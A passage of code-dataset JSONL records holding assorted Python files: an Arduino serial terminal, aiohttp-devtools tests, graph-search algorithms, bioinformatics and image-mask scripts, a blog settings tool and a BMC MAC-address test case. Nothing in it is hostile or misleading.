LOW',\n\t\t'D9 HIGH', 'D9 LOW',\n\t 'D10 HIGH','D10 LOW',\n\t 'D11 HIGH','D11 LOW',\n\t 'D12 HIGH','D12 LOW',\n\t 'D13 HIGH','D13 LOW',\n\t 'D2 READ' ,\n\t 'D3 READ' ,\n\t 'D4 READ' ,\n\t 'D5 READ' ,\n\t 'D6 READ' ,\n\t 'D7 READ' ,\n\t 'D8 READ' ,\n\t 'D9 READ' ,\n\t 'D10 READ' ,\n\t 'D11 READ' ,\n\t 'D12 READ' ,\n\t 'D13 READ' ,\n\t \t\t\t'A0 READ',\n\t \t\t\t'A1 READ',\n\t \t\t\t'A2 READ',\n\t \t\t\t'A3 READ',\n\t \t\t\t'A4 READ',\n\t \t\t\t'A5 READ']\n\nuser=str(input(\"What is your name: \"))\nport_=str(input(\"Enter the port to connect: \"))\n\ntry:\n\tboard=ser.Serial(port_,115200,timeout=0.1)\nexcept ser.serialutil.SerialException:\n\tprint(\"Board is offline\")\n\tquit()\nif board.isOpen():\n\tboard.close()\n\nboard.open()\nnow=time.time()\nconStr=\"\"\nn=0\nboard.write(\"TASIN_FIRMATA_VER\".encode())\nwhile n<=50:\n\tc=board.read()\n\tc=str(c)\n\tc=c.encode()\n\tif c!=\"\\n\":\n\t\tconStr=conStr+c\n\t\tn=n+1\n\telif c==\"\\n\":\n\t\tbreak\nif conStr==\"\":\n\tprint(\"TASIN_FIRMATA is not installed on the board @ {}. \\nGet it on https://github.com/NurTasin/tasinfirmata.git. \\nInstall the firmware on UNO and reset the Arduino\".format(board.port))\n\tquit()\nelse:\n\tprint(\"TASIN_FIRMATA Found . Version: {}\".format(conStr))\nprint(\"Board is online now @{} @{} b/s\".format(board.port,board.baudrate))\nwhile True:\n\tcommand=str(input(\"{}@TASIN_FIRMATA:{}/ $\".format(user,board.port)))\n\tif command=='quit':\n\t\tbreak\n\telif command in commands:\n\t\tboard.write(command.encode())\n\t\tfinalStr=\"\"\n\t\twhile True:\n\t\t\toutput=board.read()\n\t\t\toutput=str(output)\n\t\t\toutput=output.decode()\n\t\t\tif output!=\"\\n\":\n\t\t\t\tfinalStr=finalStr+output\n\t\t\telif output==\"\\n\":\n\t\t\t\tbreak\n\t\tprint(finalStr)\n\telif command not in commands:\n\t\tprint(\"{}: no command found\".format(command))\n\nboard.close()\n","sub_path":"tasinFirmata_terminal_python3.x.py","file_name":"tasinFirmata_terminal_python3.x.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"610744363","text":"import pytest\nfrom pytest_toolbox import mktree\n\nfrom aiohttp_devtools.exceptions import AiohttpDevConfigError\nfrom aiohttp_devtools.runserver.config import Config\n\nfrom .conftest import SIMPLE_APP, get_if_boxed\n\nif_boxed = get_if_boxed(pytest)\n\n\nasync def test_load_simple_app(tmpworkdir):\n mktree(tmpworkdir, SIMPLE_APP)\n Config(app_path='app.py')\n\n\nasync def test_create_app_wrong_name(tmpworkdir, loop):\n mktree(tmpworkdir, SIMPLE_APP)\n with pytest.raises(AiohttpDevConfigError) as excinfo:\n Config(app_path='app.py', app_factory_name='missing')\n assert excinfo.value.args[0] == 'Module \"app.py\" does not define a \"missing\" attribute/class'\n\n\ninvalid_apps = [\n (\n {\n 'foo': 'bar',\n },\n 'unable to find a recognised default file (\"app.py\" or \"main.py\") in the directory \".\"'\n ),\n (\n {\n 'app.py': \"\"\"\\\ndef not_a_default_name(loop):\n pass\"\"\"\n },\n 'No name supplied and no default app factory found in app.py'\n ),\n (\n {\n 'app.py': 'create_app = 4',\n },\n 'app_factory \"create_app\" is not callable or an instance of aiohttp.web.Application'\n ),\n (\n {\n 'app.py': \"\"\"\\\ndef app_factory(loop):\n return 43\"\"\",\n },\n 'app factory \"app_factory\" returned \"int\" not an aiohttp.web.Application'\n )\n]\n\n\n@if_boxed\n@pytest.mark.parametrize('files,exc', invalid_apps, ids=['%s...' % v[1][:40] for v in invalid_apps])\ndef test_invalid_options(tmpworkdir, files, exc, loop):\n mktree(tmpworkdir, files)\n with pytest.raises(AiohttpDevConfigError) as excinfo:\n Config(app_path='.').check(loop)\n assert exc.format(tmpworkdir=tmpworkdir) == excinfo.value.args[0]\n","sub_path":"tests/test_runserver_config.py","file_name":"test_runserver_config.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"164411846","text":"# Author: Jessica Strait\r\n# This project uses my own queue code to conduct a breadth-first sort.\r\n# It also uses my own stack code to conduct a depth-first sort.\r\n# It also runs Dijkstra's algorithm to produce a dictionary with the shortest path to each node.\r\n\r\nclass StackNode:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def __str__(self):\r\n return \"Node({})\".format(self.value)\r\n\r\n __repr__ = __str__\r\n\r\n\r\nclass Stack:\r\n\r\n def __init__(self):\r\n self.top = None\r\n\r\n def __str__(self):\r\n temp = self.top\r\n out = []\r\n while temp:\r\n out.append(str(temp.value))\r\n temp = temp.next\r\n out = '\\n'.join(out)\r\n return ('Top:{}\\nStack:\\n{}'.format(self.top, out))\r\n\r\n __repr__ = __str__\r\n\r\n def isEmpty(self):\r\n # This is where my code begins. I will start by checking to see if self.top exists.\r\n if self.top is None:\r\n # If there is no self.top, then the stack must be empty and we return true.\r\n return True\r\n else:\r\n # Otherwise, the stack is not empty and we return false.\r\n return False\r\n\r\n def __len__(self):\r\n # I'll set a temp value equal to the top of the stack, and a count variable at 0.\r\n temp = self.top\r\n count = 0\r\n # We'll traverse the stack with a while loop, adding one as long as our temp value is not none.\r\n while temp is not None:\r\n count += 1\r\n temp = temp.next\r\n # Then we return our count value.\r\n return count\r\n\r\n def peek(self):\r\n # If there is no self.top, then the stack is empty and there is nothing for us to peek.\r\n if self.top is None:\r\n return 'Stack is empty'\r\n else:\r\n # Otherwise, we return self.top. Remember to use the value function so we don't get a node!\r\n return self.top.value\r\n\r\n def push(self, value):\r\n # First, we need to create an instance of class Node at our new value. We'll call that new_node\r\n new_node = StackNode(value)\r\n # I'll set a temp variable at self.top: this is the only end we can push to.\r\n temp = self.top\r\n # I'll place our new node so it is just in front of that temp variable (the top of the stack).\r\n new_node.next = temp\r\n # Then, I'll reassign self.top as our new node. We don't need to return anything\r\n self.top = new_node\r\n\r\n def pop(self):\r\n # If the stack is empty, we can't pop anything.\r\n if self.top is None:\r\n return 'Stack is empty'\r\n else:\r\n # I'll set a temp variable at the top of the stack: this is the only end we can pop from.\r\n temp = self.top\r\n # I'll check the value of the top of the stack and create a variable to save it for later.\r\n return_value = temp.value\r\n # I need to reassign self.top as the value after that temp variable.\r\n self.top = temp.next\r\n # I can delete my temp item entirely.\r\n del temp\r\n # Now, I return the variable that I saved for later.\r\n return return_value\r\n\r\n\r\nclass QueueNode:\r\n\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def __str__(self):\r\n return \"Node({})\".format(self.value)\r\n\r\n __repr__ = __str__\r\n\r\n\r\nclass Queue:\r\n\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def __str__(self):\r\n temp = self.head\r\n out = []\r\n while temp:\r\n out.append(str(temp.value))\r\n temp = temp.next\r\n out = ' '.join(out)\r\n return ('Head:{}\\nTail:{}\\nQueue:{}'.format(self.head, self.tail, out))\r\n\r\n __repr__ = __str__\r\n\r\n def isEmpty(self):\r\n # This is where my code begins. I will check to see if self.head is none: if it is, the queue must be empty.\r\n if self.head is None:\r\n return True\r\n else:\r\n # Otherwise, the queue is not empty and we return False.\r\n return False\r\n\r\n def __len__(self):\r\n # I'll create a temp value starting at self.head, the \"front\" of the queue. I'll also set a count variable to 0.\r\n temp = self.head\r\n count = 0\r\n # We'll traverse the list until the temp value is none, meaning we've reached the end of the queue. For each\r\n # item, we increase our count value by 1.\r\n while temp is not None:\r\n count += 1\r\n temp = temp.next\r\n # Then we return our count variable.\r\n return count\r\n\r\n def enqueue(self, value):\r\n # If the queue is not empty, we need to examine the tail of the queue.\r\n if self.head is not None:\r\n # We'll create an instance of class Node at our value and call it new_node.\r\n new_node = QueueNode(value)\r\n # I'll set a temp value to the existing tail of the queue.\r\n temp = self.tail\r\n # I'll let the value after the temp variable equal our new node.\r\n temp.next = new_node\r\n # Then, I'll reassign self.tail as the new_node.\r\n self.tail = new_node\r\n else:\r\n # If the queue is empty, we still instantiate class Node at our value.\r\n new_node = QueueNode(value)\r\n # Because the queue is empty, self.head and self.tail will both equal new_node until new items are enqueued.\r\n self.head = new_node\r\n self.tail = new_node\r\n\r\n def dequeue(self):\r\n # First, we must check if the queue is empty.\r\n if self.head is not None:\r\n # Then, we need to check if the queue has only one value.\r\n if self.head == self.tail:\r\n # I'll set a variable at self.head, chosen arbitrarily over self.tail since there is only one item.\r\n item = self.head\r\n # I'll save the value of my item for returning later.\r\n return_value = item.value\r\n # I'm setting both self.head and self.tail to \"item.next,\" which is simply None. When we have dequeued\r\n # the item variable, these values should both be none.\r\n self.head = item.next\r\n self.tail = item.next\r\n # Then I delete my single item.\r\n del item\r\n # We return the value that we saved earlier.\r\n return return_value\r\n else:\r\n # If the queue has at least two values, we only examine self.head. I'll call it an item variable.\r\n item = self.head\r\n # I'll save the value of my item for returning later.\r\n return_value = item.value\r\n # I'll set the new self.head to the next item in the queue after my item.\r\n self.head = item.next\r\n # Then I delete my item.\r\n del item\r\n # We return the value that we saved earlier.\r\n return return_value\r\n else:\r\n # If the queue is empty, we cannot dequeue anything.\r\n return 'Queue is empty'\r\n\r\nclass Graph:\r\n def __init__(self, graph_repr):\r\n self.vertList = graph_repr\r\n\r\n# Breadth-first sort\r\n\r\n def bfs(self, start):\r\n # First, I want to check and make sure that the start variable is in the graph representation.\r\n if start not in self.vertList:\r\n return 'error'\r\n # I'll create a new instance of class queue.\r\n q = Queue()\r\n # I'll enqueue my \"start\" value.\r\n q.enqueue(start)\r\n # This empty list will hold each visited node, and will be what I return.\r\n visited_nodes = []\r\n # I can go ahead and append my \"start\" value to that list.\r\n visited_nodes.append(start)\r\n # I can use my isEmpty() function to check that the queue still has values in it.\r\n while not q.isEmpty():\r\n # This variable stores that values that I'm removing from the queue.\r\n dequeued_node = q.dequeue()\r\n # This for loop traverses a sorted list of all the neighbors to each dequeued item. Remember, we need to use\r\n # alphabetical order, so this sorting is important.\r\n for new_node in sorted(self.vertList[dequeued_node]):\r\n # If the type is a tuple, then the graph is weighted and I can take the value at index 0 as my value to\r\n # be appended in the output list.\r\n if type(new_node) == tuple:\r\n new_node = new_node[0]\r\n # Regardless, I need to check if my \"new_node\" variable is already in the visited nodes list.\r\n if new_node not in visited_nodes:\r\n # If it is not, I need to enqueue that value and append it to my output list. I need to enqueue it\r\n # so we can visit its neighbors with the next iteration. I must append it so it will be returned.\r\n q.enqueue(new_node)\r\n visited_nodes.append(new_node)\r\n # If the value is already in the visited_nodes list, I can just pass and continue with the loop.\r\n else:\r\n pass\r\n # The return value is the visited_nodes list that we created.\r\n return visited_nodes\r\n \r\n# Depth-first sort\r\n\r\n def dfs(self, start):\r\n # Your code starts here\r\n # As with BFS, I need to check that the start variable is in the graph representation.\r\n if start not in self.vertList:\r\n return 'error'\r\n # I'll instantiate class stack to help me out.\r\n s = Stack()\r\n # I can go ahead and push my start variable into the stack.\r\n s.push(start)\r\n # I'll create another empty visited_nodes list that I'll use as my output.\r\n visited_nodes = []\r\n # I can use my isEmpty() function to ensure that the stack is not empty.\r\n while not s.isEmpty():\r\n # I want to pop the top node on my stack.\r\n popped_node = s.pop()\r\n # If it a tuple, then we need to consider the value at index 0.\r\n if type(popped_node) == tuple:\r\n popped_node = popped_node[0]\r\n # Similar to BFS, we need to check that the popped node is not yet in the list.\r\n if popped_node not in visited_nodes:\r\n # If it isn't, we need to append the popped node.\r\n visited_nodes.append(popped_node)\r\n # We need to complete a DESCENDING sort on our list to make sure the order of our stack is correct as\r\n # the iterations continue. Remember, alphabetical order is important to us, and we are checking the\r\n # longest possible paths, so we will need to backtrack.\r\n for new_node in sorted(self.vertList[popped_node], reverse=True):\r\n # If the new node isn't in the visited_nodes list, we need to push it to the stack so we can deal\r\n # with it later.\r\n if new_node not in visited_nodes:\r\n s.push(new_node)\r\n # If the popped node is already in the list, we can just pass and continue the loop.\r\n else:\r\n pass\r\n # Again, we will return our value list as output.\r\n return visited_nodes\r\n\r\n# Dijkstra's algorithm\r\n\r\n def dijkstra(self, start):\r\n # As with BFS and DFS, I'll run the same check on the input to make sure the start value is correct.\r\n if start not in self.vertList:\r\n return 'error'\r\n # My output will be a dictionary, so I'll start with an empty one.\r\n output = {}\r\n # The visited nodes list we've been using will be helpful even if I'm not returning it.\r\n visited_nodes = []\r\n # I'm going to instantiate a queue.\r\n q = Queue()\r\n # For every node in the graph, I want to define its key in my dictionary as infinity for now.\r\n for node_value in self.vertList:\r\n output[node_value] = float('inf')\r\n # However, the key for my start value must be zero (because that will always be the shortest path to itself).\r\n output[start] = 0\r\n # Now, I'll enqueue my start variable.\r\n q.enqueue(start)\r\n # I'll use my isEmpty() function to check for values in the queue.\r\n while not q.isEmpty():\r\n # The vertex points are all in the queue, and we're going to go through them.\r\n vertex = str(q.dequeue())\r\n # For each neighbor of the vertex in the graph representation...\r\n for value in self.vertList[vertex]:\r\n # Let's make sure the edge we're traveling on isn't weighted. We may have to do some different things.\r\n if type(value) != tuple:\r\n # If the value has not yet been visited...\r\n if value not in visited_nodes:\r\n # I need to \"visit\" the node by adding it to the queue and making a note of it by appending it\r\n # to my list for future reference.\r\n visited_nodes.append(value)\r\n q.enqueue(value)\r\n # If the dictionary key of the neighbor is greater than the key of the vertex plus one, then I need\r\n # to reassign the key of my current neighbor.\r\n if output[value] > output[vertex] + 1:\r\n output[value] = output[vertex] + 1\r\n # Everything below here is for tuples, so I should continue if the value is not a tuple.\r\n continue\r\n # Now, if the value is a tuple, we need to check if the tuple at index zero has been visited.\r\n elif value[0] not in visited_nodes:\r\n # If it has not, we need to enqueue it and make a note just like we did for unweighted graphs.\r\n visited_nodes.append(value[0])\r\n q.enqueue(value[0])\r\n # Even though it looks more complicated because of the brackets, this is the same comparison that we did\r\n # earlier, but for a weighted graph. This means that our new path is shorter (and for this algorithm,\r\n # better), so we want to reassign its key to this new shorter path.\r\n if output[value[0]] > output[vertex] + value[1]:\r\n output[value[0]] = output[vertex] + value[1]\r\n # We are returning our dictionary with the shortest path possibilities saved as keys.\r\n return output\r\n","sub_path":"BFS-DFS-Dijkstra.py","file_name":"BFS-DFS-Dijkstra.py","file_ext":"py","file_size_in_byte":14673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"278191545","text":"# list of all E.coli genomes in `genome`\n\ndef make_cdhit(list_path, output_file, gene_path):\n '''\n input:\n list_path = genome lists. for example(/home/hermuba/data0118/genome_list/ecoli_rm_plasmid_1582)\n output_file = concatenated, added genome ID to the end\n gene_path = folder containing .faa from prodigal. For example:'/home/hermuba/data/genePredicted/'\n\n output: None\n '''\n # open genome list file\n f = open(list_path)\n genome = f.readlines()\n for i in range(len(genome)):\n genome[i] = genome[i].rstrip().replace(u'\\ufeff', '')\n\n #concat all .faa files into one single file\n from Bio import SeqIO\n outputHandle = open(output_file, 'a') # don't forget append mode or be stupid\n\n # read one files with SeqIO.parse() at a time\n for ID in genome:\n recordIter = SeqIO.parse(gene_path + ID + '.faa', \"fasta\")\n\n # iterate through SeqRecords, annotate with ID\n for record in recordIter:\n # record.id = 'JAPM01000001_1'\n record.id = record.id + '|' + ID\n # record.id = JAPM01000001_1|1328440.3\n\n # output to one fasta file: `E.coli_cdhit.faa`\n SeqIO.write(record, outputHandle, \"fasta\")\n\n outputHandle.close()\n","sub_path":"Genome/pangenome_build/concat_for_cdhit.py","file_name":"concat_for_cdhit.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170249629","text":"\"\"\"\nhttps://leetcode.com/problems/maximum-average-pass-ratio/\n\nFor each pair, compute benefit after addint the student to the class. \nThen do extraStudents update. \n\nTime compleixty: O(klogn), k = extraStudents, n = len(classes)\n\"\"\"\nclass Solution:\n def maxAverageRatio(self, classes: List[List[int]], extraStudents: int) -> float:\n heap = [(p/t - (p + 1)/(t+1), p, t) for p, t in classes]\n heapq.heapify(heap)\n while extraStudents:\n _, p, t = heapq.heappop(heap)\n heapq.heappush(heap, ((p+1)/(t+1) - (p+2)/(t+2), p+1, t+1))\n extraStudents -= 1\n\n ans = sum(p/t for _, p, t in heap)/len(heap)\n return ans","sub_path":"1792_MaximumAveragePassRatio.py","file_name":"1792_MaximumAveragePassRatio.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580450336","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 7)\n\n\ndef DFS(sv, mark):\n visit[sv] = mark\n\n for i in adjList[sv]:\n if not visit[i]:\n if not DFS(i, -mark):\n return False\n else:\n if visit[i] == mark:\n return False\n return True\n\n\nK = int(input())\n\nfor _ in range(K):\n V, E = map(int, input().split())\n\n adjList = [[] for _ in range(V + 1)]\n visit = [False] * (V + 1)\n\n for _ in range(E):\n sv, dv = map(int, input().split())\n\n adjList[sv].append(dv)\n adjList[dv].append(sv)\n\n isBG = True\n for i in range(1, V + 1):\n if not visit[i]:\n if not DFS(i, 1):\n isBG = False\n break\n \n print(\"YES\" if isBG else \"NO\")\n","sub_path":"BaekjoonOnlineJudge/1707/1707.py","file_name":"1707.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"630266319","text":"# Node class\n# class Node:\n#\n# # Constructor to initialize the node object\n# def __init__(self, data):\n# self.data = data\n# self.next = None\n#\n#\n# class LinkedList:\n#\n# # Function to initialize head\n# def __init__(self):\n# self.head = None\n#\n# def reverseUtil(self, curr, prev):\n#\n# # If last node mark it head\n# if curr.next is None:\n# self.head = curr\n#\n# # Update next to prev node\n# curr.next = prev\n# return\n#\n# # Save curr.next node for recursive call\n# next = curr.next\n#\n# # And update next\n# curr.next = prev\n#\n# self.reverseUtil(next, curr)\n#\n# # This function mainly calls reverseUtil()\n#\n# # with previous as None\n# def reverse(self):\n# if self.head is None:\n# return\n# self.reverseUtil(self.head, None)\n#\n# # Function to insert a new node at the beginning\n#\n# def push(self, new_data):\n# new_node = Node(new_data)\n# new_node.next = self.head\n# self.head = new_node\n#\n# # Utility function to print the linked LinkedList\n#\n# def printList(self):\n# temp = self.head\n# while (temp):\n# print(temp.data)\n# temp = temp.next\n\ndef main():\n cases = input()\n for i in range(0, cases):\n numNodes = input()\n l = []\n for j in range(0, numNodes):\n l.append(input())\n l.reverse()\n yield l\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"CiscoRotateLinkedList.py","file_name":"CiscoRotateLinkedList.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"549007714","text":"import logging\nfrom ebuildtester.docker import Docker\nfrom ebuildtester.parse import parse_commandline\nimport ebuildtester.options as options\nimport os.path\nimport sys\n\n\ndef main():\n \"\"\"The main function.\"\"\"\n\n options.init()\n\n options.log.setLevel(logging.DEBUG)\n\n options.options = parse_commandline(sys.argv[1:])\n\n options.log.info(\"creating container\")\n container = Docker(\n os.path.abspath(os.path.expanduser(options.options.portage_dir)),\n [os.path.abspath(p) for p in options.options.overlay_dir])\n\n options.log.info(\"created container \" + container.cid)\n if options.options.manual:\n container.shell()\n else:\n container.execute(\"echo emerge --ask --autounmask-write=n --verbose \" +\n \" \".join(options.options.atom) +\n \" >> ~/.bash_history\")\n try:\n container.execute(\"emerge --autounmask-write=n --verbose \" +\n \" \".join(options.options.atom))\n except Exception:\n options.log.warn(\"ignoring failure of command\")\n container.execute(\"etc-update --automode -5\")\n try:\n container.execute(\"emerge --verbose \" +\n \" \".join(options.options.atom))\n except Exception:\n options.log.warn(\"ignoring failure of command\")\n container.shell()\n","sub_path":"ebuildtester/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7093266","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nfrom tqdm import tqdm\r\nimport argparse\r\nimport json\r\n# testfiles = ['Liu100.jpg', 'Liu72.jpg', 'Liu104.jpg', 'Liu103.jpg', 'Liu88.jpg', 'Liu20.jpg', 'Liu123.jpg', 'Liu153.jpg', 'Liu163.jpg', 'Liu50.jpg', 'Liu1.jpg', 'Liu47.jpg', 'Liu37.jpg', 'Liu105.jpg', 'Liu6.jpg', 'Liu121.jpg', 'Liu149.png', 'Liu35.jpg', 'Liu56.jpg', 'Liu51.jpg', 'Liu61.jpg', 'Liu127.jpg', 'Liu160.jpg', 'Liu114.jpg', 'Liu8.jpg', 'Liu131.jpg']\r\n\r\nbounding_boxes = dict()\r\nwith open('F:/Invisible Man/new_mask_labels.json', 'r') as f:\r\n mask_labels = json.load(f)\r\n\r\nmask_labels_pbar = tqdm(mask_labels)\r\nfor row in mask_labels_pbar:\r\n img_name = row['External ID']\r\n dataset_name = row['Dataset Name']\r\n if dataset_name == 'Liu_Bolin_Studio':\r\n mask_labels_pbar.set_description(\"Processing %s\" % img_name)\r\n if 'objects' in row['Label'].keys():\r\n mask_coords_dicts = row['Label']['objects'][0]['polygon']\r\n original_img_color = cv2.imread('F:/Invisible Man/Images/Liu_Bolin_Studio/'+img_name)\r\n original_img = cv2.imread('F:/Invisible Man/Images/Liu_Bolin_Studio/'+img_name, 0)\r\n bg = np.zeros_like(original_img).astype(np.float32)\r\n mask_coords = []\r\n for mask_coords_dict in mask_coords_dicts:\r\n mask_coords.append([mask_coords_dict['x'], mask_coords_dict['y']])\r\n contour = np.array(mask_coords, dtype=np.int32)\r\n # break\r\n bbox = cv2.boundingRect(contour)\r\n bounding_boxes[img_name] = bbox\r\n mask = cv2.fillPoly(bg, pts=[contour], color=255)\r\n mask = cv2.rectangle(mask, (bbox[0], bbox[1]), (bbox[0]+bbox[2], bbox[1]+bbox[3]), 255, 3)\r\n cv2.imwrite('bounding_boxes/'+img_name, mask)\r\n # cv2.imwrite('Images/Studio_Filtered/'+img_name, original_img_color)\r\n\r\n\r\nwith open('mask_bounding_box.json', 'w') as fp:\r\n json.dump(bounding_boxes, fp)\r\n","sub_path":"LBP Classification+YOLOFace+PPD/mask_bounding_box_generator.py","file_name":"mask_bounding_box_generator.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"94978900","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport time\n\nfrom common import whiptail, file\n\ndialog = whiptail.Whiptail()\ndialog.height = 15\ndialog.title = \"SilverBlog settings tool\"\nsystem_config = {\n \"Project_Name\": \"\",\n \"Project_Description\": \"\",\n \"Project_URL\": \"\",\n \"Author_Image\": \"\",\n \"Author_Name\": \"\",\n \"Author_Introduction\": \"\",\n \"Theme\": \"\",\n \"API_Password\": \"\",\n \"Paging\": 10,\n \"Time_Format\": \"%Y-%m-%d\",\n \"Rss_Full_Content\": True,\n \"Editor\": \"nano\",\n \"i18n\": \"en-US\"\n}\nif os.path.exists(\"./config/system.json\"):\n system_config = json.loads(file.read_file(\"./config/system.json\"))\n\ndef setting_menu():\n while True:\n menu_list = [\"Use the Setup Wizard\", \"Set up basic information\", \"Set up author information\",\n \"Theme package manager\", \"Other settings\",\n \"Exit\"]\n result = dialog.menu(\"Please select an action\", menu_list)\n if result == \"Exit\":\n exit(0)\n if result == \"Use the Setup Wizard\":\n setup_wizard()\n exit(0)\n if result == \"Set up basic information\":\n project_info()\n if result == \"Set up author information\":\n author_info()\n if result == \"Theme package manager\":\n theme_manage()\n if result == \"Other settings\":\n other_info()\n save_config()\n time.sleep(0.5)\ndef save_config():\n file.write_file(\"./config/system.json\", json.dumps(system_config, indent=4, sort_keys=False, ensure_ascii=False))\n\ndef theme_manage():\n from manage import theme\n dialog.title = \"Theme package manager\"\n menu_list = [\"Install the theme\", \"Use the existing theme\", \"Upgrade existing Theme\",\n \"Uninstall existing Theme\"]\n result = dialog.menu(\"Please select an action\", menu_list)\n theme_name = \"\"\n org_list = None\n if result == \"Install the theme\":\n install_menu = [\"View list\", \"Enter the theme package name\"]\n result = dialog.menu(\"Please select an action\", install_menu)\n if result == \"View list\":\n org_list = theme.get_orgs_list()\n item_list = list()\n for item in org_list:\n item_list.append(item[\"name\"])\n theme_name = dialog.menu(\"Please select the theme you want to install:\", item_list)\n if result == \"Enter the theme package name\":\n theme_name = dialog.prompt(\"Please enter the theme package name:\")\n if len(theme_name) != 0:\n theme_name = theme.install_theme(theme_name, org_list)\n if dialog.confirm(\"Do you want to enable this theme now?\", \"no\"):\n system_config[\"Theme\"] = theme_name\n if os.path.exists(\"./templates/{}/i18n\".format(theme_name)):\n system_config[\"i18n\"] = setting_i18n(theme_name)\n return\n directories = theme.get_local_theme_list()\n theme_name = dialog.menu(\"Please select the theme to be operated:\", directories)\n if result == \"Use the existing theme\":\n system_config[\"Theme\"] = theme_name\n if os.path.exists(\"./templates/{}/i18n\".format(theme_name)):\n system_config[\"i18n\"] = setting_i18n(theme_name)\n if result == \"Upgrade existing Theme\":\n theme.upgrade_theme(theme_name)\n if result == \"Uninstall existing Theme\":\n theme.remove_theme(theme_name)\n\n\ndef setting_i18n(theme_name):\n dir_list = os.listdir(\"./templates/{0}/i18n\".format(theme_name))\n show_list = list()\n for item in dir_list:\n if item.endswith(\".json\"):\n show_list.append(item.replace(\".json\", \"\"))\n return dialog.menu(\"Please select the i18n to be operated:\", show_list)\n\ndef setup_wizard():\n project_info()\n author_info()\n other_info()\n if system_config[\"Theme\"] == \"\":\n from manage import theme\n local_theme_list = theme.get_local_theme_list()\n if len(local_theme_list) != 0:\n system_config[\"Theme\"] = dialog.menu(\"Please select the theme to be operated:\", local_theme_list)\n return\n org_list = theme.get_orgs_list()\n item_list = list()\n for item in org_list:\n item_list.append(item[\"name\"])\n theme_name = dialog.menu(\"Please select the theme you want to install:\", item_list)\n system_config[\"Theme\"] = theme.install_theme(theme_name, org_list)\n save_config()\n\ndef show_prompt(items):\n for item in items:\n system_config[item[\"name\"]] = dialog.prompt(\"Please enter the {}:\".format(item[\"info\"]),\n system_config[item[\"name\"]])\n\ndef project_info():\n items = [{\"name\": \"Project_Name\", \"info\": \"blog name\"}, {\"name\": \"Project_Description\", \"info\": \"blog description\"},\n {\"name\": \"Project_URL\", \"info\": \"blog access URL\"}]\n show_prompt(items)\n new_password = dialog.prompt(\"Please enter the remote management tool password:\", system_config[\"API_Password\"],\n True)\n if len(new_password) != 0:\n import hashlib\n system_config[\"API_Password\"] = json.dumps(\n {\"hash_password\": hashlib.md5(new_password.encode('utf-8')).hexdigest()})\n\ndef author_info():\n items = [{\"name\": \"Author_Name\", \"info\": \"author name\"},\n {\"name\": \"Author_Introduction\", \"info\": \"author introduction\"}]\n show_prompt(items)\n if dialog.confirm(\"Use Gravatar?\", \"no\"):\n from manage import get\n system_config[\"Author_Image\"] = get.get_gravatar(system_config[\"Author_Name\"])\n return\n system_config[\"Author_Image\"] = dialog.prompt(\"Please enter the author image:\", system_config[\"Author_Image\"])\n\ndef other_info():\n system_config[\"Paging\"] = int(dialog.prompt(\"Please enter the paging:\", str(system_config[\"Paging\"])))\n items = [{\"name\": \"Time_Format\", \"info\": \"time format\"},\n {\"name\": \"Editor\", \"info\": \"editor\"}]\n show_prompt(items)\n system_config[\"Rss_Full_Content\"] = dialog.confirm(\"Output full text Rss?\", \"yes\")\n","sub_path":"manage/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254412627","text":"from case.CBaseCase import *\n\nclass T2786_bmc_NonVolatileBMCMACAddr(CBaseCase):\n '''\n **************************************************************\n [Purpose ]: Verify that the BMC MAC address is stored in an area \n of non-volatile memory and it will not be erased in \n the course of FW image update except uboot FW update. \n [Author ]: Forrest.Gu@emc.com\n [Sprint ]: ATOM W32\n [Tickets ]: ATOM-1897\n [Platform]: All\n [Type ]: Auto\n [History ]:\n - Forrest.Gu@emc.com 08/07/2014\n First edition.\n **************************************************************\n '''\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n \n def config(self):\n CBaseCase.config(self)\n # To do: Case specific config\n \n def test(self):\n \n _bmc = self.enclosure.sp.bmc\n _fw = self.enclosure.sp.firmware\n _sp = self.enclosure.sp\n \n # 1. Prepare data of IP source, IP, netmask and MAC address\n orig_list_mac = _bmc.get_mac()\n orig_int_ip_source = _bmc.get_lan_ip_source()\n orig_list_ip = _bmc.get_lan_ip_address()\n orig_list_netmask = _bmc.get_lan_netmask()\n \n # 2. Set MAC address to a new one and verify\n self.log('INFO', 'Set MAC address and verify it is set as expected')\n new_list_mac = orig_list_mac[:]\n new_list_mac[-1] += 5\n new_list_mac[-1] %= 256\n _bmc.set_mac(new_list_mac)\n time.sleep(10)\n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After set MAC address, expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after set MAC address')\n 